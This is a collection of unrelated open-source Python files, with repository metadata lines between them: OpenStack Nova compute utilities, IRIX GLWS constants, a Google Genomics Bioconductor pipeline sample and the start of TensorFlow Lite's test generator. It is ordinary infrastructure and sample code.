action=fields.NotificationAction.ADD_MEMBER),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_instance_rebuild(context, instance, host,
action=fields.NotificationAction.REBUILD,
phase=None,
source=fields.NotificationSource.COMPUTE,
exception=None, bdms=None):
"""Send versioned notification about instance rebuild
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param action: the name of the action
:param phase: the phase of the action
:param source: the source of the notification
:param exception: the thrown exception (used in error notifications)
:param bdms: BlockDeviceMappingList object for the instance. If it is not
provided then we will load it from the db if so configured
"""
fault, priority = _get_fault_and_priority_from_exception(exception)
payload = instance_notification.InstanceActionRebuildPayload(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
notification = instance_notification.InstanceActionRebuildNotification(
context=context,
priority=priority,
publisher=notification_base.NotificationPublisher(
host=host, source=source),
event_type=notification_base.EventType(
object='instance',
action=action,
phase=phase),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_metrics_update(context, host, host_ip, nodename,
monitor_metric_list):
"""Send versioned notification about updating metrics
:param context: the request context
:param host: the host emitting the notification
:param host_ip: the IP address of the host
:param nodename: the node name
:param monitor_metric_list: the MonitorMetricList object
"""
payload = metrics_notification.MetricsPayload(
host=host,
host_ip=host_ip,
nodename=nodename,
monitor_metric_list=monitor_metric_list)
notification = metrics_notification.MetricsNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='metrics',
action=fields.NotificationAction.UPDATE),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_libvirt_connect_error(context, ip, exception):
"""Send a versioned notification about libvirt connect error.
:param context: the request context
:param ip: the IP address of the host
:param exception: the thrown exception
"""
fault, _ = _get_fault_and_priority_from_exception(exception)
payload = libvirt_notification.LibvirtErrorPayload(ip=ip, reason=fault)
notification = libvirt_notification.LibvirtErrorNotification(
priority=fields.NotificationPriority.ERROR,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='libvirt',
action=fields.NotificationAction.CONNECT,
phase=fields.NotificationPhase.ERROR),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_volume_usage(context, vol_usage, host):
"""Send versioned notification about the volume usage
:param context: the request context
:param vol_usage: the volume usage object
:param host: the host emitting the notification
"""
payload = volume_notification.VolumeUsagePayload(
vol_usage=vol_usage)
notification = volume_notification.VolumeUsageNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE),
event_type=notification_base.EventType(
object='volume',
action=fields.NotificationAction.USAGE),
payload=payload)
notification.emit(context)
@rpc.if_notifications_enabled
def notify_about_compute_task_error(context, action, instance_uuid,
request_spec, state, exception):
"""Send a versioned notification about compute task error.
:param context: the request context
:param action: the name of the action
:param instance_uuid: the UUID of the instance
:param request_spec: the request spec object or
the dict includes request spec information
:param state: the vm state of the instance
:param exception: the thrown exception
:param tb: the traceback
"""
if (request_spec is not None and
not isinstance(request_spec, objects.RequestSpec)):
request_spec = objects.RequestSpec.from_primitives(
context, request_spec, {})
fault, _ = _get_fault_and_priority_from_exception(exception)
payload = task_notification.ComputeTaskPayload(
instance_uuid=instance_uuid, request_spec=request_spec, state=state,
reason=fault)
notification = task_notification.ComputeTaskNotification(
priority=fields.NotificationPriority.ERROR,
publisher=notification_base.NotificationPublisher(
host=CONF.host, source=fields.NotificationSource.CONDUCTOR),
event_type=notification_base.EventType(
object='compute_task',
action=action,
phase=fields.NotificationPhase.ERROR),
payload=payload)
notification.emit(context)
def refresh_info_cache_for_instance(context, instance):
"""Refresh the info cache for an instance.
:param instance: The instance object.
"""
if instance.info_cache is not None and not instance.deleted:
# Catch the exception in case the instance got deleted after the check
# instance.deleted was executed
try:
instance.info_cache.refresh()
except exception.InstanceInfoCacheNotFound:
LOG.debug("Can not refresh info_cache because instance "
"was not found", instance=instance)
def get_reboot_type(task_state, current_power_state):
"""Checks if the current instance state requires a HARD reboot."""
if current_power_state != power_state.RUNNING:
return 'HARD'
if task_state in task_states.soft_reboot_states:
return 'SOFT'
return 'HARD'
def get_machine_ips():
"""Get the machine's ip addresses
:returns: list of Strings of ip addresses
"""
addresses = []
for interface in netifaces.interfaces():
try:
iface_data = netifaces.ifaddresses(interface)
for family in iface_data:
if family not in (netifaces.AF_INET, netifaces.AF_INET6):
continue
for address in iface_data[family]:
addr = address['addr']
# If we have an ipv6 address remove the
# %ether_interface at the end
if family == netifaces.AF_INET6:
addr = addr.split('%')[0]
addresses.append(addr)
except ValueError:
pass
return addresses
def upsize_quota_delta(new_flavor, old_flavor):
"""Calculate deltas required to adjust quota for an instance upsize.
:param new_flavor: the target instance type
:param old_flavor: the original instance type
"""
def _quota_delta(resource):
return (new_flavor[resource] - old_flavor[resource])
deltas = {}
if _quota_delta('vcpus') > 0:
deltas['cores'] = _quota_delta('vcpus')
if _quota_delta('memory_mb') > 0:
deltas['ram'] = _quota_delta('memory_mb')
return deltas
def get_headroom(quotas, usages, deltas):
headroom = {res: quotas[res] - usages[res]
for res in quotas.keys()}
# If quota_cores is unlimited [-1]:
# - set cores headroom based on instances headroom:
if quotas.get('cores') == -1:
if deltas.get('cores'):
hc = headroom.get('instances', 1) * deltas['cores']
headroom['cores'] = hc / deltas.get('instances', 1)
else:
headroom['cores'] = headroom.get('instances', 1)
# If quota_ram is unlimited [-1]:
# - set ram headroom based on instances headroom:
if quotas.get('ram') == -1:
if deltas.get('ram'):
hr = headroom.get('instances', 1) * deltas['ram']
headroom['ram'] = hr / deltas.get('instances', 1)
else:
headroom['ram'] = headroom.get('instances', 1)
return headroom
def check_num_instances_quota(
context, flavor, min_count, max_count, project_id=None, user_id=None,
orig_num_req=None,
):
"""Enforce quota limits on number of instances created."""
# project_id is also used for the TooManyInstances error message
if project_id is None:
project_id = context.project_id
if user_id is None:
user_id = context.user_id
# Check whether we need to count resources per-user and check a per-user
# quota limit. If we have no per-user quota limit defined for a
# project/user, we can avoid wasteful resource counting.
user_quotas = objects.Quotas.get_all_by_project_and_user(
context, project_id, user_id)
if not any(r in user_quotas for r in ['instances', 'cores', 'ram']):
user_id = None
# Determine requested cores and ram
req_cores = max_count * flavor.vcpus
req_ram = max_count * flavor.memory_mb
deltas = {'instances': max_count, 'cores': req_cores, 'ram': req_ram}
try:
# NOTE(johngarbutt) when using unified limits, this is call
# is a no op, and as such, this function always returns max_count
objects.Quotas.check_deltas(context, deltas,
project_id, user_id=user_id,
check_project_id=project_id,
check_user_id=user_id)
except exception.OverQuota as exc:
quotas = exc.kwargs['quotas']
overs = exc.kwargs['overs']
usages = exc.kwargs['usages']
# This is for the recheck quota case where we used a delta of zero.
if min_count == max_count == 0:
# orig_num_req is the original number of instances requested in the
# case of a recheck quota, for use in the over quota exception.
req_cores = orig_num_req * flavor.vcpus
req_ram = orig_num_req * flavor.memory_mb
requested = {'instances': orig_num_req, 'cores': req_cores,
'ram': req_ram}
(overs, reqs, total_alloweds, useds) = get_over_quota_detail(
deltas, overs, quotas, requested)
msg = "Cannot run any more instances of this type."
params = {'overs': overs, 'pid': project_id, 'msg': msg}
LOG.debug("%(overs)s quota exceeded for %(pid)s. %(msg)s",
params)
raise exception.TooManyInstances(overs=overs,
req=reqs,
used=useds,
allowed=total_alloweds)
# OK, we exceeded quota; let's figure out why...
headroom = get_headroom(quotas, usages, deltas)
allowed = headroom.get('instances', 1)
# Reduce 'allowed' instances in line with the cores & ram headroom
if flavor.vcpus:
allowed = min(allowed, headroom['cores'] // flavor.vcpus)
if flavor.memory_mb:
allowed = min(allowed, headroom['ram'] // flavor.memory_mb)
# Convert to the appropriate exception message
if allowed <= 0:
msg = "Cannot run any more instances of this type."
elif min_count <= allowed <= max_count:
# We're actually OK, but still need to check against allowed
return check_num_instances_quota(
context, flavor, min_count, allowed, project_id=project_id,
user_id=user_id)
else:
msg = "Can only run %s more instances of this type." % allowed
num_instances = (str(min_count) if min_count == max_count else
"%s-%s" % (min_count, max_count))
requested = dict(instances=num_instances, cores=req_cores,
ram=req_ram)
(overs, reqs, total_alloweds, useds) = get_over_quota_detail(
headroom, overs, quotas, requested)
params = {'overs': overs, 'pid': project_id,
'min_count': min_count, 'max_count': max_count,
'msg': msg}
if min_count == max_count:
LOG.debug("%(overs)s quota exceeded for %(pid)s,"
" tried to run %(min_count)d instances. "
"%(msg)s", params)
else:
LOG.debug("%(overs)s quota exceeded for %(pid)s,"
" tried to run between %(min_count)d and"
" %(max_count)d instances. %(msg)s",
params)
raise exception.TooManyInstances(overs=overs,
req=reqs,
used=useds,
allowed=total_alloweds)
return max_count
def get_over_quota_detail(headroom, overs, quotas, requested):
reqs = []
useds = []
total_alloweds = []
for resource in overs:
reqs.append(str(requested[resource]))
useds.append(str(quotas[resource] - headroom[resource]))
total_alloweds.append(str(quotas[resource]))
(overs, reqs, useds, total_alloweds) = map(', '.join, (
overs, reqs, useds, total_alloweds))
return overs, reqs, total_alloweds, useds
def remove_shelved_keys_from_system_metadata(instance):
# Delete system_metadata for a shelved instance
for key in ['shelved_at', 'shelved_image_id', 'shelved_host']:
if key in instance.system_metadata:
del (instance.system_metadata[key])
def create_image(context, instance, name, image_type, image_api,
extra_properties=None):
"""Create new image entry in the image service. This new image
will be reserved for the compute manager to upload a snapshot
or backup.
:param context: security context
:param instance: nova.objects.instance.Instance object
:param name: string for name of the snapshot
:param image_type: snapshot | backup
:param image_api: instance of nova.image.glance.API
:param extra_properties: dict of extra image properties to include
"""
properties = {
'instance_uuid': instance.uuid,
'user_id': str(context.user_id),
'image_type': image_type,
}
properties.update(extra_properties or {})
image_meta = initialize_instance_snapshot_metadata(
context, instance, name, properties)
# if we're making a snapshot, omit the disk and container formats,
# since the image may have been converted to another format, and the
# original values won't be accurate. The driver will populate these
# with the correct values later, on image upload.
if image_type == 'snapshot':
image_meta.pop('disk_format', None)
image_meta.pop('container_format', None)
return image_api.create(context, image_meta)
def initialize_instance_snapshot_metadata(context, instance, name,
extra_properties=None):
"""Initialize new metadata for a snapshot of the given instance.
:param context: authenticated RequestContext; note that this may not
be the owner of the instance itself, e.g. an admin creates a
snapshot image of some user instance
:param instance: nova.objects.instance.Instance object
:param name: string for name of the snapshot
:param extra_properties: dict of extra metadata properties to include
:returns: the new instance snapshot metadata
"""
image_meta = utils.get_image_from_system_metadata(
instance.system_metadata)
image_meta['name'] = name
# If the user creating the snapshot is not in the same project as
# the owner of the instance, then the image visibility should be
# "shared" so the owner of the instance has access to the image, like
# in the case of an admin creating a snapshot of another user's
# server, either directly via the createImage API or via shelve.
extra_properties = extra_properties or {}
if context.project_id != instance.project_id:
# The glance API client-side code will use this to add the
# instance project as a member of the image for access.
image_meta['visibility'] = 'shared'
extra_properties['instance_owner'] = instance.project_id
# TODO(mriedem): Should owner_project_name and owner_user_name
# be removed from image_meta['properties'] here, or added to
# [DEFAULT]/non_inheritable_image_properties? It is confusing
# otherwise to see the owner project not match those values.
else:
# The request comes from the owner of the instance so make the
# image private.
image_meta['visibility'] = 'private'
# Delete properties that are non-inheritable
properties = image_meta['properties']
keys_to_pop = set(CONF.non_inheritable_image_properties).union(
NON_INHERITABLE_IMAGE_PROPERTIES)
for ns in NON_INHERITABLE_IMAGE_NAMESPACES:
keys_to_pop |= {key for key in properties
if key.startswith(ns)}
for key in keys_to_pop:
properties.pop(key, None)
# The properties in extra_properties have precedence
properties.update(extra_properties)
return image_meta
def delete_image(context, instance, image_api, image_id, log_exc_info=False):
"""Deletes the image if it still exists.
Ignores ImageNotFound if the image is already gone.
:param context: the nova auth request context where the context.project_id
matches the owner of the image
:param instance: the instance for which the snapshot image was created
:param image_api: the image API used to delete the image
:param image_id: the ID of the image to delete
:param log_exc_info: True if this is being called from an exception handler
block and traceback should be logged at DEBUG level, False otherwise.
"""
LOG.debug("Cleaning up image %s", image_id, instance=instance,
log_exc_info=log_exc_info)
try:
image_api.delete(context, image_id)
except exception.ImageNotFound:
# Since we're trying to cleanup an image, we don't care if
# if it's already gone.
pass
except Exception:
LOG.exception("Error while trying to clean up image %s",
image_id, instance=instance)
def may_have_ports_or_volumes(instance):
"""Checks to see if an instance may have ports or volumes based on vm_state
This is primarily only useful when instance.host is None.
:param instance: The nova.objects.Instance in question.
:returns: True if the instance may have ports of volumes, False otherwise
"""
# NOTE(melwitt): When an instance build fails in the compute manager,
# the instance host and node are set to None and the vm_state is set
# to ERROR. In the case, the instance with host = None has actually
# been scheduled and may have ports and/or volumes allocated on the
# compute node.
if instance.vm_state in (vm_states.SHELVED_OFFLOADED, vm_states.ERROR):
return True
return False
def get_stashed_volume_connector(bdm, instance):
"""Lookup a connector dict from the bdm.connection_info if set
Gets the stashed connector dict out of the bdm.connection_info if set
and the connector host matches the instance host.
:param bdm: nova.objects.block_device.BlockDeviceMapping
:param instance: nova.objects.instance.Instance
:returns: volume connector dict or None
"""
if 'connection_info' in bdm and bdm.connection_info is not None:
# NOTE(mriedem): We didn't start stashing the connector in the
# bdm.connection_info until Mitaka so it might not be there on old
# attachments. Also, if the volume was attached when the instance
# was in shelved_offloaded state and it hasn't been unshelved yet
# we don't have the attachment/connection information either.
connector = jsonutils.loads(bdm.connection_info).get('connector')
if connector:
if connector.get('host') == instance.host:
return connector
LOG.debug('Found stashed volume connector for instance but '
'connector host %(connector_host)s does not match '
'the instance host %(instance_host)s.',
{'connector_host': connector.get('host'),
'instance_host': instance.host}, instance=instance)
if (instance.host is None and
may_have_ports_or_volumes(instance)):
LOG.debug('Allowing use of stashed volume connector with '
'instance host None because instance with '
'vm_state %(vm_state)s has been scheduled in '
'the past.', {'vm_state': instance.vm_state},
instance=instance)
return connector
class EventReporter(object):
"""Context manager to report instance action events.
If constructed with ``graceful_exit=True`` the __exit__ function will
handle and not re-raise on InstanceActionNotFound.
"""
def __init__(self, context, event_name, host, *instance_uuids,
graceful_exit=False):
self.context = context
self.event_name = event_name
self.instance_uuids = instance_uuids
self.host = host
self.graceful_exit = graceful_exit
def __enter__(self):
for uuid in self.instance_uuids:
objects.InstanceActionEvent.event_start(
self.context, uuid, self.event_name, want_result=False,
host=self.host)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
for uuid in self.instance_uuids:
try:
objects.InstanceActionEvent.event_finish_with_failure(
self.context, uuid, self.event_name, exc_val=exc_val,
exc_tb=exc_tb, want_result=False)
except exception.InstanceActionNotFound:
# If the instance action was not found then determine if we
# should re-raise based on the graceful_exit attribute.
with excutils.save_and_reraise_exception(
reraise=not self.graceful_exit):
if self.graceful_exit:
return True
return False
def wrap_instance_event(prefix, graceful_exit=False):
"""Wraps a method to log the event taken on the instance, and result.
This decorator wraps a method to log the start and result of an event, as
part of an action taken on an instance.
:param prefix: prefix for the event name, usually a service binary like
"compute" or "conductor" to indicate the origin of the event.
:param graceful_exit: True if the decorator should gracefully handle
InstanceActionNotFound errors, False otherwise. This should rarely be
True.
"""
@utils.expects_func_args('instance')
def helper(function):
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
wrapped_func = safe_utils.get_wrapped_function(function)
keyed_args = inspect.getcallargs(wrapped_func, self, context,
*args, **kwargs)
instance_uuid = keyed_args['instance']['uuid']
event_name = '{0}_{1}'.format(prefix, function.__name__)
host = self.host if hasattr(self, 'host') else None
with EventReporter(context, event_name, host, instance_uuid,
graceful_exit=graceful_exit):
return function(self, context, *args, **kwargs)
return decorated_function
return helper
class UnlimitedSemaphore(object):
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
@property
def balance(self):
return 0
# This semaphore is used to enforce a limit on disk-IO-intensive operations
# (image downloads, image conversions) at any given time.
# It is initialized at ComputeManager.init_host()
disk_ops_semaphore = UnlimitedSemaphore()
@contextlib.contextmanager
def notify_about_instance_delete(notifier, context, instance,
delete_type='delete',
source=fields.NotificationSource.API):
try:
notify_about_instance_usage(notifier, context, instance,
"%s.start" % delete_type)
# Note(gibi): force_delete types will be handled in a
# subsequent patch
if delete_type in ['delete', 'soft_delete']:
notify_about_instance_action(
context,
instance,
host=CONF.host,
source=source,
action=delete_type,
phase=fields.NotificationPhase.START)
yield
finally:
notify_about_instance_usage(notifier, context, instance,
"%s.end" % delete_type)
if delete_type in ['delete', 'soft_delete']:
notify_about_instance_action(
context,
instance,
host=CONF.host,
source=source,
action=delete_type,
phase=fields.NotificationPhase.END)
def update_pci_request_spec_with_allocated_interface_name(
context, report_client, pci_requests, provider_mapping):
"""Update the instance's PCI request based on the request group -
resource provider mapping and the device RP name from placement.
:param context: the request context
:param report_client: a SchedulerReportClient instance
:param pci_requests: A list of InstancePCIRequest objects to be updated
:param provider_mapping: the request group - resource provider mapping
in the form returned by the RequestSpec.get_request_group_mapping()
call.
:raises AmbigousResourceProviderForPCIRequest: if more than one
resource provider provides resource for the given PCI request.
:raises UnexpectResourceProviderNameForPCIRequest: if the resource
provider, which provides resource for the pci request, does not
have a well formatted name so we cannot parse the parent interface
name out of it.
"""
if not pci_requests:
return
def needs_update(pci_request, mapping):
return (pci_request.requester_id and
pci_request.requester_id in mapping)
for pci_request in pci_requests:
if needs_update(pci_request, provider_mapping):
provider_uuids = provider_mapping[pci_request.requester_id]
if len(provider_uuids) != 1:
raise exception.AmbiguousResourceProviderForPCIRequest(
providers=provider_uuids,
requester=pci_request.requester_id)
dev_rp_name = report_client.get_resource_provider_name(
context,
provider_uuids[0])
# NOTE(gibi): the device RP name reported by neutron is
# structured like <hostname>:<agentname>:<interfacename>
rp_name_pieces = dev_rp_name.split(':')
if len(rp_name_pieces) != 3:
ex = exception.UnexpectedResourceProviderNameForPCIRequest
raise ex(
provider=provider_uuids[0],
requester=pci_request.requester_id,
provider_name=dev_rp_name)
for spec in pci_request.spec:
spec['parent_ifname'] = rp_name_pieces[2]
def delete_arqs_if_needed(context, instance, arq_uuids=None):
"""Delete Cyborg ARQs for the instance.
:param context
:param instance: instance who own the args
:param uuids: delete arqs by uuids while did not bind to instance yet.
"""
cyclient = cyborg.get_client(context)
dp_name = instance.flavor.extra_specs.get('accel:device_profile')
if dp_name:
LOG.debug('Calling Cyborg to delete ARQs for instance %(instance)s',
{'instance': instance.uuid})
try:
cyclient.delete_arqs_for_instance(instance.uuid)
except exception.AcceleratorRequestOpFailed as e:
LOG.exception('Failed to delete accelerator requests for '
'instance %s. Exception: %s', instance.uuid, e)
if arq_uuids:
LOG.debug('Calling Cyborg to delete ARQs by uuids %(uuid)s for'
' instance %(instance)s',
{'instance': instance.uuid,
'uuid': arq_uuids})
cyclient.delete_arqs_by_uuid(arq_uuids)
|
openstack/nova
|
nova/compute/utils.py
|
Python
|
apache-2.0
| 63,683 | 0.000094 |
NOERROR = 0
NOCONTEXT = -1
NODISPLAY = -2
NOWINDOW = -3
NOGRAPHICS = -4
NOTTOP = -5
NOVISUAL = -6
BUFSIZE = -7
BADWINDOW = -8
ALREADYBOUND = -100
BINDFAILED = -101
SETFAILED = -102
|
xbmc/atv2
|
xbmc/lib/libPython/Python/Lib/plat-irix6/GLWS.py
|
Python
|
gpl-2.0
| 181 | 0 |
#!/usr/bin/python
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Python sample demonstrating use of the Google Genomics Pipelines API.
This sample demonstrates a pipeline that uses Bioconductor to analyze
files in Google Cloud Storage.
This pipeline is run in an "ephemeral" manner; no call to pipelines.create()
is necessary. No pipeline is persisted in the pipelines list.
"""
import pprint
import time
from oauth2client.client import GoogleCredentials
from apiclient.discovery import build
PROJECT_ID='**FILL IN PROJECT ID**'
BUCKET='**FILL IN BUCKET**'
# Output will be written underneath gs://<BUCKET>/<PREFIX>/
PREFIX='pipelines-api-examples/bioconductor'
# Update this path if you uploaded the script elsewhere in Cloud Storage.
SCRIPT='gs://%s/%s/script.R' % (BUCKET, PREFIX)
# This script will poll for completion of the pipeline.
POLL_INTERVAL_SECONDS = 20
# Create the genomics service.
credentials = GoogleCredentials.get_application_default()
service = build('genomics', 'v1alpha2', credentials=credentials)
# Run the pipeline.
operation = service.pipelines().run(body={
# The ephemeralPipeline provides the template for the pipeline.
# The pipelineArgs provide the inputs specific to this run.
'ephemeralPipeline' : {
'projectId': PROJECT_ID,
'name': 'Bioconductor: count overlaps in a BAM',
'description': 'This sample demonstrates a subset of the vignette https://bioconductor.org/packages/release/bioc/vignettes/BiocParallel/inst/doc/Introduction_To_BiocParallel.pdf.',
# Define the resources needed for this pipeline.
'resources' : {
# Specify default VM parameters for the pipeline.
'minimumCpuCores': 1, # TODO: remove this when the API has a default.
'minimumRamGb': 3.75, # TODO: remove this when the API has a default.
# Create a data disk that is attached to the VM and destroyed when the
# pipeline terminates.
'disks': [ {
'name': 'data',
'autoDelete': True,
# Within the docker container, specify a mount point for the disk.
# The pipeline input argument below will specify that inputs should be
# written to this disk.
'mountPoint': '/mnt/data',
# Specify a default size and type.
'sizeGb': 100, # TODO: remove this when the API has a default
'type': 'PERSISTENT_HDD', # TODO: remove this when the API has a default
} ],
},
# Specify the docker image to use along with the command. See
# http://www.bioconductor.org/help/docker/ for more detail.
'docker' : {
'imageName': 'bioconductor/release_core',
# Change into the directory in which the script and input reside. Then
# run the R script in batch mode to completion.
'cmd': '/bin/bash -c "cd /mnt/data/ ; R CMD BATCH script.R"',
},
'inputParameters' : [ {
'name': 'script',
'description': 'Cloud Storage path to the R script to run.',
'localCopy': {
'path': 'script.R',
'disk': 'data'
}
}, {
'name': 'bamFile',
'description': 'Cloud Storage path to the BAM file.',
'localCopy': {
'path': 'input.bam',
'disk': 'data'
}
}, {
'name': 'indexFile',
'description': 'Cloud Storage path to the BAM index file.',
'localCopy': {
'path': 'input.bam.bai',
'disk': 'data'
}
} ],
'outputParameters' : [ {
'name': 'outputFile',
'description': 'Cloud Storage path for where to write the result.',
'localCopy': {
'path': 'overlapsCount.tsv',
'disk': 'data'
}
}, {
'name': 'rBatchLogFile',
'description': 'Cloud Storage path for where to write the R batch log file.',
'localCopy': {
'path': 'script.Rout',
'disk': 'data'
}
} ]
},
'pipelineArgs' : {
'projectId': PROJECT_ID,
# Here we use a very tiny BAM as an example but this pipeline could be invoked in
# a loop to kick off parallel execution of this pipeline on, for example, all the
# 1000 Genomes phase 3 BAMs in
# gs://genomics-public-data/ftp-trace.ncbi.nih.gov/1000genomes/ftp/phase3/data/*/alignment/*.mapped.ILLUMINA.bwa.*.low_coverage.20120522.bam'
# emitting a distinct output file for each result. Then you can:
# gsutil cat gs://<BUCKET>/<PREFIX>/output/*tsv > allOverlapsCount.tsv
# to create the final consolidated TSV file.
'inputs': {
'script': SCRIPT,
'bamFile': 'gs://genomics-public-data/ftp-trace.ncbi.nih.gov/1000genomes/ftp/technical/pilot3_exon_targetted_GRCh37_bams/data/NA06986/alignment/NA06986.chromMT.ILLUMINA.bwa.CEU.exon_targetted.20100311.bam',
'indexFile': 'gs://genomics-public-data/ftp-trace.ncbi.nih.gov/1000genomes/ftp/technical/pilot3_exon_targetted_GRCh37_bams/data/NA06986/alignment/NA06986.chromMT.ILLUMINA.bwa.CEU.exon_targetted.20100311.bam.bai'
},
# Pass the user-specified Cloud Storage destination for pipeline output.
'outputs': {
# The R script explicitly writes out one file of results.
'outputFile': 'gs://%s/%s/output/overlapsCount.tsv' % (BUCKET, PREFIX),
# R, when run in batch mode, writes console output to a file.
'rBatchLogFile': 'gs://%s/%s/output/script.Rout' % (BUCKET, PREFIX)
},
# Pass the user-specified Cloud Storage destination for pipeline logging.
'logging': {
'gcsPath': 'gs://%s/%s/logging' % (BUCKET, PREFIX)
},
# TODO: remove this when the API has a default
'serviceAccount': {
'email': 'default',
'scopes': [
'https://www.googleapis.com/auth/compute',
'https://www.googleapis.com/auth/devstorage.full_control',
'https://www.googleapis.com/auth/genomics'
]
}
}
}).execute()
# Emit the result of the pipeline run submission and poll for completion.
pp = pprint.PrettyPrinter(indent=2)
pp.pprint(operation)
operation_name = operation['name']
print
print "Polling for completion of operation"
while not operation['done']:
print "Operation not complete. Sleeping %d seconds" % (POLL_INTERVAL_SECONDS)
time.sleep(POLL_INTERVAL_SECONDS)
operation = service.operations().get(name=operation_name).execute()
print
print "Operation complete"
print
pp.pprint(operation)
|
googlegenomics/pipelines-api-examples
|
bioconductor/run_bioconductor.py
|
Python
|
bsd-3-clause
| 6,448 | 0.004498 |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generate a series of TensorFlow graphs that become tflite test cases.
Usage:
generate_examples <output directory>
bazel run //tensorflow/lite/testing:generate_examples
To more easily debug failures use (or override) the --save_graphdefs flag to
place text proto graphdefs into the generated zip files.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import operator
import os
import random
import re
import string
import tempfile
import traceback
import zipfile
import numpy as np
from six import StringIO
from six.moves import xrange
# TODO(aselle): Disable GPU for now
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# pylint: disable=g-import-not-at-top
import tensorflow as tf
from google.protobuf import text_format
# TODO(aselle): switch to TensorFlow's resource_loader
from tensorflow.lite.testing import generate_examples_report as report_lib
from tensorflow.lite.testing import string_util_wrapper
from tensorflow.python.framework import test_util
from tensorflow.python.framework import graph_util as tf_graph_util
from tensorflow.python.ops import rnn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import spectral_ops_test_util
RANDOM_SEED = 342
TEST_INPUT_DEPTH = 3
# A map from regular expression to bug number. Any test failure with label
# matching the expression will be considered due to the corresponding bug.
KNOWN_BUGS = {
# TOCO doesn't support scalars as input.
# Concat doesn't work with a single input tensor
r"concat.*num_tensors=1": "67378344",
# Transposition in MatMul is not fully supported.
"fully_connected.*transpose_a=True": "67586970",
# Softmax graphs are too complex.
r"softmax.*dim=0": "67749831",
# BatchToSpaceND only supports 4D tensors.
r"batch_to_space_nd.*input_shape=\[8,2,2,2,1,1\]": "70594733",
# Div will use floordiv.
r"div.*int32": "72051395",
}
class Options(object):
"""All options for example generation."""
def __init__(self):
# Directory where the outputs will be go.
self.output_path = None
# Particular zip to output.
self.zip_to_output = None
# Path to toco tool.
self.toco = None
# If a particular model is affected by a known bug count it as a Toco
# error.
self.known_bugs_are_errors = False
# Raise an exception if any converter error is encountered.
self.ignore_converter_errors = False
# Include intermediate graphdefs in the output zip files.
self.save_graphdefs = False
# Whether the TFLite Flex converter is being used.
self.run_with_flex = False
# The function to convert a TensorFLow model to TFLite model.
# See the document for `toco_convert` function for its required signature.
# TODO(ycling): Decouple `toco_convert` function from this module, and
# remove the `toco` attribute in this class.
self.tflite_convert_function = toco_convert
# A map from regular expression to bug number. Any test failure with label
# matching the expression will be considered due to the corresponding bug.
self.known_bugs = KNOWN_BUGS
# A map from names to functions which make test cases.
_MAKE_TEST_FUNCTIONS_MAP = {}
# A decorator to register the make test functions.
# Usage:
# All the make_*_test should be registered. Example:
# @register_make_test_function()
# def make_conv_tests(options):
# # ...
# If a function is decorated by other decorators, it's required to specify the
# name explicitly. Example:
# @register_make_test_function(name="make_unidirectional_sequence_lstm_tests")
# @test_util.enable_control_flow_v2
# def make_unidirectional_sequence_lstm_tests(options):
# # ...
def register_make_test_function(name=None):
def decorate(function, name=name):
if name is None:
name = function.__name__
_MAKE_TEST_FUNCTIONS_MAP[name] = function
return decorate
class ExtraTocoOptions(object):
"""Additional toco options besides input, output, shape."""
def __init__(self):
# Whether to ignore control dependency nodes.
self.drop_control_dependency = False
# Allow custom ops in the toco conversion.
self.allow_custom_ops = False
# Rnn states that are used to support rnn / lstm cells.
self.rnn_states = None
# Split the LSTM inputs from 5 inoputs to 18 inputs for TFLite.
self.split_tflite_lstm_inputs = None
def toco_options(data_types,
input_arrays,
output_arrays,
shapes,
extra_toco_options=ExtraTocoOptions()):
"""Create TOCO options to process a model.
Args:
data_types: input and inference types used by TOCO.
input_arrays: names of the input tensors
output_arrays: name of the output tensors
shapes: shapes of the input tensors
extra_toco_options: additional toco options
Returns:
the options in a string.
"""
shape_str = ":".join([",".join(str(y) for y in x) for x in shapes if x])
inference_type = "FLOAT"
# TODO(ahentz): if we get multi-input quantization to work we need this
# to change
if data_types[0] == "QUANTIZED_UINT8":
inference_type = "QUANTIZED_UINT8"
s = (" --input_data_types=%s" % ",".join(data_types) +
" --inference_type=%s" % inference_type +
" --input_format=TENSORFLOW_GRAPHDEF" + " --output_format=TFLITE" +
" --input_arrays=%s" % ",".join(input_arrays) +
" --output_arrays=%s" % ",".join(output_arrays))
if shape_str:
s += (" --input_shapes=%s" % shape_str)
if extra_toco_options.drop_control_dependency:
s += " --drop_control_dependency"
if extra_toco_options.allow_custom_ops:
s += " --allow_custom_ops"
if extra_toco_options.rnn_states:
s += (" --rnn_states='" + extra_toco_options.rnn_states + "'")
if extra_toco_options.split_tflite_lstm_inputs is not None:
if extra_toco_options.split_tflite_lstm_inputs:
s += " --split_tflite_lstm_inputs=true"
else:
s += " --split_tflite_lstm_inputs=false"
return s
def format_result(t):
"""Convert a tensor to a format that can be used in test specs."""
if t.dtype.kind not in [np.dtype(np.string_).kind, np.dtype(np.object_).kind]:
# Output 9 digits after the point to ensure the precision is good enough.
values = ["{:.9f}".format(value) for value in list(t.flatten())]
return ",".join(values)
else:
